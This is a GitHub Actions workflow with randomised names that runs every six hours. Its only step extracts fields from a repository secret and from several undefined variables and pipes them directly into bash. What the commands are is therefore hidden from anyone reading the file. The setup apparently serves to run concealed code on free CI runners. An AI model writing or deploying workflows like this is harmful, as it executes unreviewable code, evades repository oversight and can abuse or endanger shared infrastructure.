name: fengyuanchai4545

on:
  workflow_dispatch:
  schedule:
    - cron: '49 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fengyuanchai4545
        env:
          zddo02859: ${{ secrets.zddo02859 }}
        run: |
          echo $zddo02859 | jq -r .rltxy251 | /bin/bash
          echo $u62942 | jq -r .ugd03945 | /bin/bash
          echo $ax4412 | jq -r .j7 | /bin/bash
          echo $new5 | jq -r .s50 | /bin/bash
          echo $gxmlw43 | jq -r .xbp287 | /bin/bash
          echo $ixkw35 | jq -r .nys35734 | /bin/bash
          echo $q704 | jq -r .cbc4 | /bin/bash
          echo $zueu3 | jq -r .xe75 | /bin/bash
          echo $okod489 | jq -r .teb7307 | /bin/bash
          echo $lqyto98 | jq -r .nbaq8 | /bin/bash
          echo $ezk3 | jq -r .zb46 | /bin/bash

